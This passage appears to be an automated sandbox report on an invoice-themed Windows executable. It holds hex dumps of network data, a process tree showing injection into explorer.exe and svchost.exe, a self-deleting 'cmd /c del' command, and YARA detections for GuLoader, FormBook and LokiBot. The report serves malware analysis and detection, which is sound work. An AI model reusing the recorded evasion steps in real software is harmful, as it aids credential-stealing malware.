2021-12-01 09:32:47 UTC	62	IN	Data Raw: ba c3 71 01 9c 73 1d 49 67 0e ba 11 f1 1e 77 d7 51 08 ee 5f 63 84 92 1d b1 92 06 bf ba b7 cb 24 7a 98 5d 92 ac c5 33 61 49 e1 5b ed 98 75 11 56 fa 32 f0 6d 31 27 86 96 87 99 d6 ce be 88 13 e4 28 95 99 22 e0 80 d7 d9 99 f3 73 d1 86 87 86 19 1f a4 ce 78 d1 da 67 fd 77 97 5d 25 95 85 b8 15 d9 38 f9 a8 c7 cf db f4 85 7f 2e 7e 06 21 a9 29 c5 bd d9 bb 1f 46 74 51 1e a6 db 88 13 7a 97 e0 43 7c 95 d0 0d ee 0b ca 37 67 51 e4 9d c4 0d 5a 4a d0 ac 9b d8 41 d4 09 8d 91 20 9d a8 08 94 d0 90 a7 8e 7a 56 9f dd 46 2b 98 3f 36 0c bc a0 7e ae 5a 85 ad c5 0d d9 66 5c 75 71 78 d1 6f 50 3a d6 a3 03 1d 95 38 83 db 4e a0 23 b4 3f f8 76 2f e2 10 5e ea 35 3e b4 ec db 88 dc 57 2b ff d7 a7 be 90 e3 86 d3 4d 97 af 34 22 14 b6 91 b2 9a 5d 52 83 23 23 41 f4 ea 71 a8 a0 f2 6e 0a 81 f2 Data Ascii: qsIgwQ_c$z]3aI[uV2m1'("sxgw]%8.~!)FtQzC\|7gQZJA zVF+?6~Zf\uqxoP:8N#?v/^5>W+M4"]R##Aqn
2021-12-01 09:32:47 UTC	70	IN	Data Raw: bf 05 36 b2 9c 34 2a 17 3d 3a 5a 8e 55 f8 ad 29 86 94 89 82 98 97 9c 61 a3 e6 27 16 3d c8 25 a5 90 5b 75 65 3f ff 8c 50 2a e0 2d 0e 99 e4 8d c2 b4 25 10 5b ab 8b 30 70 9d a0 94 fd 76 ef a5 c4 1d 4e a0 38 15 69 30 28 12 0d 93 05 e8 47 3b 79 02 3f a5 71 0e 07 02 af 1d 72 a7 13 35 46 97 76 8c b8 89 46 8d 33 b0 c3 5f 1a 33 ba 75 cc 8d 8e cd 1a d8 55 e0 15 5e 93 3f 23 87 85 34 32 b8 39 ff f3 05 0c 40 50 da 53 6f 2b fe cd 85 12 1c ae 36 c3 32 f4 94 35 b1 51 4b 01 6c a3 6e 0c d2 91 a6 01 50 85 90 fc 75 d9 fb d7 f0 a4 d3 0b 2a 8a b2 2a 55 a9 cd 6e 3f db 9b 3c 75 94 57 0b 7f 63 95 10 a5 7b 5b 4e e1 3f 7b e6 e5 f4 10 72 5e e8 c9 86 a3 78 1c d5 9e a2 ad 2e 6c a4 61 9e 52 be 65 6a 7b 51 3d 08 0b d5 11 27 a5 12 0b b1 9b ee 8f d1 d5 3a ee f9 45 6e 41 2e ea 94 9b a7 85 Data Ascii: 64=:ZU)a'=%[ue?P-%[0pvN8i0(G;y?qr5FvF3_3uU^?#429@PSo+625QKlnPu**Un?<uWc{[N?{r^x.laRej{Q=':EnA.
2021-12-01 09:32:47 UTC	78	IN	Data Raw: f1 a5 06 45 4a a3 cd 1a 90 06 c3 2f 58 5e e3 82 10 67 37 45 e8 2b 1b 34 59 5f c1 81 f5 a3 0e 73 f9 d4 cc 81 2f 9c bc ac 3a 2e 44 3d f0 4f c9 3f 65 87 fa 43 10 c3 65 94 01 db 05 6d c7 7b a3 4e b9 69 85 85 3c 10 2b 10 44 59 22 35 f9 d6 2b 21 bc 40 f1 bb 1c 24 47 af 83 8a e0 5e e8 94 37 5e 60 01 d2 a0 f4 4f 29 98 83 8a c3 2d 32 10 26 e9 7b 3a c4 cc 87 8b 11 d6 6c 3c b1 29 02 e9 ee 25 37 d3 7f f6 8b 0d 8f 3c ef 74 11 f2 6c c0 1a 17 38 d4 88 ea 03 c4 77 45 a7 93 0f 02 5f 95 cb 22 d2 01 f4 e5 93 f1 da 06 b0 98 a1 e4 27 12 e2 64 46 7f 13 3a db 69 9c 4d 42 98 f6 2e d9 bc a0 1c 52 89 33 e4 9e 0f de 6f 0c 98 83 f3 38 64 1c b0 6f d4 aa fa 5f 8e db b9 05 83 fe 6c e1 52 72 03 1e a8 91 7c e7 cb c4 ca 53 aa 5e 95 4b f8 f2 45 38 a9 f1 26 d5 ad d4 68 c7 02 8c 61 01 db bd Data Ascii: EJ/X^g7E+4Y_s/:.D=O?eCem{Ni<+DY"5+!@$G^7^`O)-2&{:l<)%7<tl8wE_"'dF:iMB.R3o8do_lRr\|S^KE8&ha
2021-12-01 09:32:47 UTC	86	IN	Data Raw: 81 06 c7 a4 5c 97 fa a0 e2 93 6a 9b 82 f9 e9 8a d9 02 3c 1b e8 0b ab 42 57 99 05 89 0a bd 37 66 a6 26 2c c6 6c 10 cd 74 00 23 d1 33 f2 a4 b9 60 25 1a 36 e9 8f 26 5c 9e 2f f0 81 33 ea c8 85 ed 9c 78 13 5c 49 9e 64 65 a1 89 51 dd a3 15 fb 5a b1 b5 0e 63 ca 9e 36 72 1a b0 6e 6a 6a 33 05 e2 17 06 fa 79 e5 17 0f ad a0 6f 5b db a4 7e fc 5f b7 e1 3c ea 0a 68 51 7b bb a0 19 ec ad a7 91 1a 24 96 76 9d 4c 6e 79 79 14 e1 89 78 ef 5e d3 6b a6 ce 0c 34 e0 1e ef 27 b1 71 37 21 14 2b 1e 46 b2 30 e0 de 0e 06 18 77 b5 8b 12 ef ba 30 a6 5e eb 04 8e e1 3e c3 cb f2 2d 0c 61 ad 43 c7 82 54 b1 ac 41 a2 fd 2d 32 ae e9 cc e1 a6 8d be 07 65 1b ab 6a 7a 2d c3 c0 e7 cf 79 15 d2 ec 7e 32 d7 3a 62 e2 cf 94 69 8b e4 21 13 f1 0a 14 45 7e 2e ad 5d dc 9f 78 36 3f 49 87 e2 38 5a ee fd 21 Data Ascii: \j<BW7f&,lt#3`%6&\/3x\IdeQZc6rnjj3yo[~_<hQ{$vLnyyx^k4'q7!+F0w0^>-aCTA-2ejz-y~2:bi!E~.]x6?I8Z!
2021-12-01 09:32:47 UTC	94	IN	Data Raw: 02 ee 3f 3d 52 32 4d 04 17 00 07 44 14 3f 40 3e d7 e6 37 05 2a b3 02 88 7f 43 d0 83 c0 2b 2e ce 77 83 cd 35 a7 5e 32 c8 f7 3d c4 9a 4d 30 08 a5 07 b0 94 2b 43 e3 3e 3a e4 a2 b3 96 61 de e9 74 99 33 90 9f 74 dd d1 89 e3 88 30 11 f3 a8 9c 1e 6f db e0 27 33 10 f1 c7 a3 61 ef 07 9c e4 86 67 91 95 66 80 e7 da 10 30 ae 40 4f a0 39 2d 69 69 cb ed f2 93 35 36 89 69 d8 af 8f 09 8e a1 ab 57 38 94 dc 96 73 53 80 e5 c4 26 c3 d8 9e 23 d1 cb 98 99 68 99 10 35 cd ec 24 74 0d 77 18 c7 69 f0 c4 ed 71 ce 3d 06 77 7e c6 8b 35 c9 26 67 16 65 fe 0d 6b 16 aa 29 ed 89 c4 7f c2 53 6a fc dd 9d fd 8b 73 8b f9 18 b5 71 ac 4e 71 1f 3d 77 50 ec ce 8d 6e 6f 4c 2d 63 52 75 d8 81 97 60 74 f5 28 ba 5f 91 62 7e e3 5c f6 a8 7c b8 5a 42 5b e1 dd ff bf ee 5c 7b 73 5f 18 d3 0e 69 51 20 11 12 Data Ascii: ?=R2MD?@>7*C+.w5^2=M0+C>:at3t0o'3agf0@O9-ii56iW8sS&#h5$twiq=w~5&gek)SjsqNq=wPnoL-cRu`t(_b~\\|ZB[\{s_iQ
2021-12-01 09:32:47 UTC	101	IN	Data Raw: 69 45 0d ec 5d 9b 8a 72 7c 12 15 9e b6 16 f2 0d b6 b8 a6 bc f9 b0 ca 6c c2 11 82 06 fd cf ce 83 9c 93 29 2a 44 34 85 e4 9b 8a b9 17 e4 51 f4 13 9e 2c 04 f5 dc 12 0f b5 6a 92 6c cb ce 26 c0 c2 22 f2 0c cc 0c 78 68 44 62 e2 da 72 7d 67 5e 62 a1 3a 78 20 9c 63 02 21 60 b2 4f 02 89 0e 40 0b c1 49 0d 00 e8 38 fa 28 03 a1 d9 aa d7 7b a5 81 64 57 5a cf c1 19 5b 7e d9 67 55 86 37 d8 19 10 63 43 8a b1 0d 09 71 00 9d ef 4b 1f 38 ad 9f 32 13 6f 50 a8 dd 7c f8 5b a7 f0 7a 7f 00 2a f4 5e a3 cf e9 aa aa 6c 51 70 65 a4 8c ef aa 84 8b da b7 80 0e f3 f5 be bf 7f b6 20 57 71 e1 fd bf cc 42 06 68 84 47 f1 93 c6 d6 0b c7 8a c2 d1 0d da 57 3b 97 7a f2 8d cb f0 39 99 b3 ba 49 4e 07 5a 38 be 96 1e 08 a0 d7 f3 4a 52 fd f4 ad e7 50 0b 81 3d cf d1 1b 05 f6 f9 ed 2f 93 5b 6b ea c4 Data Ascii: iE]r\|l)D4Q,jl&"xhDbr}g^b:x c!`O@I8({dWZ[~gU7cCqK82oP\|[z^lQpe WqBhGW;z9INZ8JRP=/[k
2021-12-01 09:32:47 UTC	109	IN	Data Raw: 0e 80 bc 7b 1d 94 eb b2 ea c5 d5 35 2a a5 34 cc d1 31 77 59 5e 6b 72 16 9c 4b 6e 55 a5 66 d5 ed 1b 58 fb 78 68 3a e0 86 32 0a d9 4f ca 40 03 65 b6 07 1b ff 0d 5f cf 02 56 26 9a c3 4e 74 01 38 62 44 55 78 c1 af 45 cd e6 a0 41 71 71 0c 85 0e 16 d4 ea 2b 26 64 36 80 f4 8d 39 06 ff 9c 4b 6a dd 93 34 6e de d4 1f 83 07 68 08 e7 f1 65 12 55 61 e2 f1 6e 91 d5 9a 10 67 06 54 e3 5b 91 00 0d dc 34 5c 03 56 f4 47 79 10 1d 70 12 33 2a 21 03 5c 18 20 04 91 14 6a c2 c3 73 8c 1c 62 a5 2c 1c c9 50 8a 36 eb e6 d7 67 8e 41 0b 01 a1 ae 64 81 ca 15 16 22 5f de dd 6d 9b bb c4 39 4b aa 69 55 2a 32 a8 3e ff 2b 61 de bd 44 ee 58 ea fc 36 24 28 9d 55 94 52 b9 36 0d 5f e5 c0 fa d0 5a b7 5f 7b b1 65 dd 1b ad aa 5b 76 49 9a 27 a1 53 28 00 dc bf e9 49 eb 47 dd ea 9f 23 0a 92 90 34 0c Data Ascii: {541wY^krKnUfXxh:2O@e_V&Nt8bDUxEAqq+&d69Kj4nheUangT[4\VGyp3!\ jsb,P6gAd"_m9KiU*2>+aDX6$(UR6_Z_{e[vI'S(IG#4
2021-12-01 09:32:47 UTC	117	IN	Data Raw: 6f bf 53 ee 2a b1 08 f4 65 01 76 e4 e0 fe 08 6c a4 af 00 c4 6c 4d c0 c0 0b 69 67 4d 48 7f 29 fe ef 19 5f 8f fe 63 99 68 c7 89 c3 f0 3f d8 ed 4c 8a 16 6a 23 44 14 96 ab 69 5e a0 33 b5 3e 1d 75 ff 9d cf 6e 81 64 dc 39 c1 59 7c 32 5f a2 51 78 e6 73 5d 8d d4 5b 41 80 5c af fa 3a 3b ab 55 f8 9d d8 a0 3c 49 60 10 14 0d d0 0a 90 a3 f6 d5 86 00 a5 c8 1b d9 bd df eb 15 42 0f 68 d2 9b 5a 5f db 4b f3 29 a0 a0 e6 03 b8 90 5b ab ff 82 e3 10 0c 2c 4e 18 29 7f 5d 42 fc db f0 f2 06 f9 89 00 2f f4 47 a6 0c 98 41 22 b8 90 de 72 a6 9b 35 46 42 f8 24 5a 07 9f ed 0c 81 21 a0 68 a5 92 27 9a 65 62 14 26 ce 78 8c 68 65 14 52 f8 88 01 ee 6a 7b d0 ed 02 f3 99 ce e8 32 77 4b 2b a6 5e 06 0e 85 50 9a 56 32 2c b0 35 b1 63 b7 65 6e 62 6f 0c ee 13 a6 50 d9 c2 d0 f9 19 3b 99 d7 f0 67 d3 Data Ascii: oS*evllMigMH)_ch?Lj#Di^3>und9Y\|2_Qxs][A\:;U<I`BhZ_K)[,N)]B/GA"r5FB$Z!h'eb&xheRj{2wK+^PV2,5cenboP;g
2021-12-01 09:32:47 UTC	125	IN	Data Raw: 13 4e f6 57 ad 3a ad 9c 4e f0 bf 7b 70 a1 28 8c ee f4 0a f4 40 90 72 99 0b 89 13 1e 68 c1 71 d0 98 61 1a d2 07 02 07 40 ff b6 2f f9 43 ac 82 b0 2a bb e5 14 98 0d 24 b9 06 a0 aa d0 77 7f 85 ba b4 60 07 77 c1 0b f3 ab 73 93 90 5f 80 a8 93 a1 e3 ed 1f 99 f6 01 c4 27 3b c2 b8 f9 27 fb 0c 6e fb 91 22 59 33 12 3a 29 42 8a 72 ca 93 dd b9 7a aa 5f c2 ef d5 6d b8 60 bc 07 0a fd a0 c1 0a 91 ad 11 5e fb 93 6b 09 6e 0f 8c 2b e9 13 56 13 75 c3 cb b3 c2 8d 8c 60 23 ac de b8 68 84 f2 06 65 df 5c 2a 49 bd 40 fd 8f 81 4a da da 30 46 f6 3e 05 e3 1e b1 44 56 32 08 40 01 15 4f a5 4d 14 bd e5 0e 51 d2 48 fb 68 56 8a b4 7f 4d 1e 67 40 34 b1 66 07 0a 68 57 f3 f4 70 f9 84 d7 7e e8 6b bb 14 c5 80 a2 d9 01 22 df b9 16 a5 59 3c e8 5a 60 46 2f 21 06 77 b8 7e 5e 90 95 b3 38 8b 6a 1f Data Ascii: NW:N{p(@rhqa@/C$w`ws_';'n"Y3:)Brz_m`^kn+Vu`#he\I@J0F>DV2@OMQHhVMg@4fhWp~k"Y<Z`F/!w~^8j
2021-12-01 09:32:47 UTC	133	IN	Data Raw: 7c 27 ba 1f 12 04 49 8d 41 1f 8a 31 16 a4 7d f5 19 05 08 7d a8 05 b5 bd f9 a2 c8 b5 8a cf 18 28 bc f6 d7 d1 74 70 67 d2 85 99 45 9f 8c 35 19 88 15 a9 de 5a 0f f2 ec 0d 26 31 71 a1 10 4a fa da ad a9 f9 f5 b4 16 64 4c 83 96 1c 59 2c e3 3d be bc eb 17 18 4f 72 8e aa fe b8 f3 e5 5e 7b 86 4b 77 0b f9 69 dd 2c 88 ee 7a 91 05 43 ce a9 b0 43 16 94 1e 96 ac b6 96 c6 57 6c ff cf 96 42 0d 3f 87 e3 39 c0 c0 f2 6a 3f cb c0 dc 85 74 fd 32 df 2f a9 c8 5b 96 65 a3 6d b9 a4 7a c3 b0 b2 4a 39 bb 7c 2b ed 0d a6 9d 0d 15 f4 fe 16 c5 c1 d2 b8 09 66 a9 31 12 f5 ab 9b 60 71 98 11 8e e1 d8 4f 63 ee 9b de 92 dc 40 24 a7 94 67 bc 41 f3 b5 1f 46 46 54 a8 8a 54 30 47 9f 6a 47 2b c6 fd c1 db 54 8d 92 bc c7 b4 f1 c9 ec 23 70 f0 da b2 73 ea 94 ce 59 bb 5c d5 e8 fc 5a bd 45 fa 0d 48 c7 Data Ascii: \|'IA1}}(tpgE5Z&1qJdLY,=Or^{Kwi,zCCWlB?9j?t2/[emzJ9\|+f1`qOc@$gAFFTT0GjG+T#psY\ZEH
2021-12-01 09:32:47 UTC	140	IN	Data Raw: 25 91 8d 0d a5 39 a0 1f a9 7d cf 72 00 71 81 e5 d8 29 e1 3a 51 af d6 6b fa 60 89 15 99 20 b9 86 a1 7f c5 4d ac 30 2a 48 45 d3 9d 05 ba 7f 0a 40 f0 27 43 f0 18 26 2d 7a 59 59 69 50 96 47 fd 8f 65 39 9f f0 f9 f8 aa 76 2d df 0c 6f 58 ab 02 97 02 ec c0 0c 81 0b 5c 7f 91 38 32 db 0f 6a e8 50 00 be 32 d1 b9 bb d0 59 f2 fe d9 8e 5d 66 22 a8 0e 69 45 6a 6a b3 97 55 13 a2 6f ee 30 74 7f b8 bb c5 3f 8b 9b 13 3e 11 00 f8 1e 53 0a e7 a4 e4 96 aa ef d8 f3 a5 34 a6 4b 1e 5f 9c 76 8b 19 df e5 2d b9 ef 29 9d bf 6a 8d cc 0a 0d ba 55 aa c4 42 a2 a9 57 5e 44 3b 87 28 cf 98 26 04 05 72 4f 3f 09 8b 70 04 07 07 93 39 45 c1 0b b1 8d 33 0f 64 23 11 22 04 8d 04 d2 d7 88 24 f2 de d1 e0 8c 5e 27 74 0e 1d b5 bb ae c2 ef 0a ae 99 2a 6b bb 70 82 58 b5 88 c1 b3 aa 98 34 1f fb a5 3c 6d Data Ascii: %9}rq):Qk` M0HE@'C&-zYYiPGe9v-oX\82jP2Y]f"iEjjUo0t?>S4K_v-)jUBW^D;(&rO?p9E3d#"$^'tkpX4<m
2021-12-01 09:32:47 UTC	148	IN	Data Raw: 1a 4e 83 81 00 9e db cc d6 1a 36 d3 c9 6f 54 70 ca b1 46 df 7a d9 9b 1f 5a 6e bf 05 b7 4c 13 b2 ff 12 ef 68 a8 5a ab f6 e1 98 f5 e1 19 f3 4c 0c 5c 5c 78 e0 fe a3 ce 07 e0 93 47 9d cc b9 ab e5 a6 51 af 6d 1c 51 d9 e6 28 2b 38 c7 74 90 f7 96 7e f8 ef 35 5f e0 3e 0d 72 38 91 8c d5 05 6b 74 bd 4a fd 29 ba 97 5a 4a bd 6c 07 f6 e7 f9 77 85 d9 0c d8 ec 74 89 0e 33 8b 77 3f fe 38 73 9f 3a d6 ba e7 6a fd 59 50 ac fd 16 78 52 b6 60 e4 1a df 6b 41 80 28 10 5e 25 04 f6 70 71 4d 16 a6 a0 3e ff 1b fc 8d a0 89 dc 55 6d 9e a6 73 a5 a7 ae 78 37 58 e0 51 62 52 3e 3b 9d 9c 22 9d de f9 a2 3d 43 1f 80 5e c3 9a f8 7e 7c df 72 c7 a9 45 45 86 ff aa a7 ea e1 fb 46 7b a0 24 4f 18 61 49 30 6a 15 6e bf 46 ab d8 1a 31 3f 0e 10 70 e7 02 a8 32 92 46 b3 61 0b a6 30 32 79 80 25 2f 37 b9 Data Ascii: N6oTpFzZnLhZL\\xGQmQ(+8t~5_>r8ktJ)ZJlwt3w?8s:jYPxR`kA(^%pqM>Umsx7XQbR>;"=C^~\|rEEF{$OaI0jnF1?p2Fa02y%/7
2021-12-01 09:32:47 UTC	156	IN	Data Raw: 78 fc 2c 94 96 14 d5 2f fe b8 d7 5b dd cf 61 8c 0e df ae 75 2a 2e 39 0c f7 be c3 be 66 58 e0 f3 9b c1 af 4e e0 36 be 64 08 e6 a3 25 a9 3d 7c 10 2f b8 88 ec 1b b5 0b e6 21 3c 4b 6f a6 41 bd a8 9f 6c fd 6f 87 37 60 ec b8 aa 09 31 b8 52 f8 f1 38 d3 de c0 c7 a9 e6 8f d3 ff 60 d0 1e 65 56 bb 35 aa a4 70 e6 a5 9a ae ca c5 db 06 99 75 05 49 99 52 3d 97 32 28 3b 0c 07 a9 3d 1c 85 9a a7 b6 1d b8 d7 91 40 ea 5e 50 89 23 89 93 cb fd 8f 84 5e 05 65 cf be 9c d3 b0 6f c3 16 50 5a 41 16 8c 9e 8d b0 83 a8 85 df 57 c3 1d 84 01 db cf 70 0e c5 f2 fb 5b 73 50 12 c2 d9 62 e3 c3 5a db 9a bb 12 6f 38 5e b6 5f a1 64 57 15 91 16 27 e2 ad 2d 0b e2 79 b6 1d 35 68 67 74 c5 05 7a b0 df d6 04 3a a0 17 cc 79 be 94 48 9d 2a b7 a6 0e 85 20 72 b2 28 73 65 73 d9 b5 26 02 08 ab 73 a2 38 1c Data Ascii: x,/[au.9fXN6d%=\|/!<KoAlo7`1R8`eV5puIR=2(;=@^P#^eoPZAWp[sPbZo8^_dW'-y5hgtz:yH r(ses&s8

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: draft_inv dec21.exe PID: 5460 Parent PID: 1656

General

Start time:	10:31:38
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\draft_inv dec21.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\draft_inv dec21.exe"
Imagebase:	0x400000
File size:	135168 bytes
MD5 hash:	89A584ACAEB2F9E8BAF46714EB7D3550
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: UserOOBEBroker.exe PID: 1968 Parent PID: 1040

General

Start time:	10:31:47
Start date:	01/12/2021
Path:	C:\Windows\System32\oobe\UserOOBEBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Imagebase:	0x7ff66af90000
File size:	57856 bytes
MD5 hash:	BCE744909EB87F293A85830D02B3D6EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: draft_inv dec21.exe PID: 2748 Parent PID: 5460

General

Start time:	10:32:12
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\draft_inv dec21.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\draft_inv dec21.exe"
Imagebase:	0x400000
File size:	135168 bytes
MD5 hash:	89A584ACAEB2F9E8BAF46714EB7D3550
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.6918674914.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.6928961290.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.6378969703.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 4580 Parent PID: 2748

General

Start time:	10:32:48
Start date:	01/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6df2d0000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.6802590112.000000000A6D5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.6850300790.000000000A6D5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 1340 Parent PID: 4580

General

Start time:	10:33:04
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x510000
File size:	47016 bytes
MD5 hash:	B7C999040D80E5BF87886D70D992C51E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.11094891807.0000000004057000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.11089571434.0000000003650000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.11085185929.0000000002D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.11089242635.0000000003620000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 7068 Parent PID: 1340

General

Start time:	10:33:07
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\draft_inv dec21.exe"
Imagebase:	0xc10000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 1028 Parent PID: 7068

General

Start time:	10:33:08
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7e89f0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: draft_inv dec21.exe PID: 5460 Parent PID: 1656 draft_inv dec21.exeCOMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	75%
Signature Coverage:	40.1%
Total number of Nodes:	521
Total number of Limit Nodes:	14

Executed Functions

Function 0242CB27, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 273
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(-14528618,?,-4859E446), ref: 0242CDE8

Strings

`7v, xrefs: 0242B031
7, xrefs: 0242CD7E
$V, xrefs: 0242A8F7
&, xrefs: 0242F732
;D'T, xrefs: 0242B0F4
P4, xrefs: 0242F723
ln[, xrefs: 0242B0DF

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: &$7$;D'T$P4$`7v$$V$ln[
API String ID: 2167126740-180710348
Opcode ID: b22288bd320a3d0e780ee08f79eb31cfce5ce7229e99a88f30c9869b1edddd36
Instruction ID: 3e459ea1ff0556d1b6e123cf2195faf591230cd04bf17369455c1f26c703a6cd
Opcode Fuzzy Hash: b22288bd320a3d0e780ee08f79eb31cfce5ce7229e99a88f30c9869b1edddd36
Instruction Fuzzy Hash: 8EA137756443459FDB308E29CD947DE37B2EF4A394F86412FDC8A9B650D7308A8ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 0242FCFD, Relevance: 9.9, APIs: 1, Strings: 4, Instructions: 1179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`7v, xrefs: 0242B031
$V, xrefs: 0242A8F7
;D'T, xrefs: 0242B0F4
ln[, xrefs: 0242B0DF

Memory Dump Source

Source File: 00000001.00000002.6381836030.0000000002420000.00000040.00000001.sdmp, Offset: 02420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2420000_draft_inv dec21.jbxd

Yara matches

Similarity

API ID:
String ID: ;D'T$`7v$$V$ln[
API String ID: 0-2775860289
Opcode ID: 9e76bc74871d88e8e2f16718d97cf7d42472d9b02bfaafaeaf51647350156c8b
Instruction ID: 35aeaf05f6b90668ceccdac53dc4e7fdbdb9c3a519e37de5d778645fda6866a7
Opcode Fuzzy Hash: 9e76bc74871d88e8e2f16718d97cf7d42472d9b02bfaafaeaf51647350156c8b
Instruction Fuzzy Hash: E392757160431A9FDF349E39C9907EA77A2FF56390F95412ECC8A9B254D33489CACB42

Uniqueness

Uniqueness Score: -1.00%

